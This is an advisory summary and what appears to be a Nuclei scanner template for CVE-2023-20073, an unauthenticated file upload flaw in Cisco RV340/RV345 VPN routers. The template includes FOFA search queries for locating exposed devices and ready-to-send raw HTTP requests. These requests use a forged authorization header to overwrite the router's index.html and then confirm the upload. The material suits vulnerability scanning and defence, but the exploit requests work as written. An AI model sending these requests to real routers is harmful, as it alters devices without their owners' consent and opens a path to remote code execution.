A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
PoC代码[已公开]
id: CVE-2023-20073
info:
name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload
author: princechaddha,ritikchaddha
severity: critical
description: |
A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
remediation: |
Apply the latest security patches provided by Cisco to mitigate this vulnerability.
reference:
- https://unsafe.sh/go-173464.html
- https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f
- https://github.com/RegularITCat/CVE-2023-20073/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2023-20073
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-20073
cwe-id: CWE-434
epss-score: 0.89713
epss-percentile: 0.99542
cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: cisco
product: rv340_firmware
fofa-query:
- app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
- app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p"
tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive
variables:
html_comment: "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body
http:
- raw:
- |
GET /index.html HTTP/1.1
Host: {{Hostname}}
- |
POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1
Host: {{Hostname}}
Authorization: 1
Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="pathparam"
Portal
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="fileparam"
index.html
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="file.path"
index.html
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="file"; filename="index.html"
Content-Type: application/octet-stream
{{index}}
{{html_comment}}
--------------------------f6f99e26f3a45adf--
- |
GET /index.html HTTP/1.1
Host: {{Hostname}}
extractors:
- type: dsl
name: index
internal: true
dsl:
- body_1
matchers:
- type: word
part: body_3
words:
- "{{html_comment}}"
# digest: 4a0a00473045022100ec4162a5bb11983cdb1c16097528bcc595aff266512dd5266c25c54c5170837502200fb6aea9eb7f321135cb4ef4291f83686223ef33290068e48a6b5775d4a9b3de:922c64590222798bb761d5b6d8e72950